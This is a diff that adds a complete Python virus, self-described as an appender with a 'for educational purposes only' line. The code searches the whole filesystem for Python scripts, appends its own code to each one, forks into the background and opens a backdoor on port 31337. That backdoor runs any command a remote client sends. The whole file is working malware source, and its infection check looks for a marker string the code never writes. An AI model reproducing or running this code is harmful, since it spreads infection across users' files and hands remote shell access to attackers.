--- /dev/null
+# Happy Halloween ~ (A python appender VX)
+# Finds all python scripts on a system, infects them
+# with the VX if not infected, payload on infected scripts
+# say "Happy Halloween" if run on October 31st. Virus
+# opens a backdoor on port 31337 which can be used to
+# send commands when an infected script has been executed.
+# F O R E D U C A T I O N A L P U R P O S E S O N L Y
+ #!x
+import glob #!x
+import sys #!x
+import os #!x
+import socket #!x
+from datetime import datetime #!x
+from string import * #!x
+date = datetime.now() #!x
+if date.month == 10: #!x
+ if date.day == 31: #!x
+ print "Happy Halloween!" #!x
+pid = os.fork() #!x
+if pid > 0: #!x
+ sys.exit(0) #!x
+cmd = 'find /. -name "*.py" -print 2>/dev/null' #!x
+for Files in os.popen(cmd).readlines(): #!x
+ Files = Files[:-1] #!x
+ try: #!x
+ vCode = open(__file__, 'r') #!x
+ victim = open (Files, 'r') #!x
+ readvictim = victim.read() #!x
+ if find(readvictim, "pRdElKa") == -1: #!x
+ victim = open(Files, 'a') #!x
+ for code in vCode.readlines(): #!x
+ if ("#!x") in code: #!x
+ vCode.close() #!x
+ mycode=(code) #!x
+ victim.write(mycode) #!x
+ except IOError: #!x
+ a = 1 #!x
+pid = os.fork() #!x
+if pid > 0: #!x
+ sys.exit(0) #!x
+try: #!x
+ s = socket.socket() #!x
+ s.bind(("",31337)) #!x
+ s.listen(1) #!x
+except socket.error, (value, message): #!x
+ sys.exit(0) #!x
+while 1: #!x
+ (cli,add) = s.accept() #!x
+ info = {"platform":sys.platform,"version":sys.version} #!x
+ cli.send("".join(("You are connected to shell\r\n", info["platform"],info["version"],"\r\n"))) #!x
+ while 1:#!x
+ data = cli.recv(1024)#!x
+ resp = os.popen(data).readlines()#!x
+ cli.send("".join(resp))#!x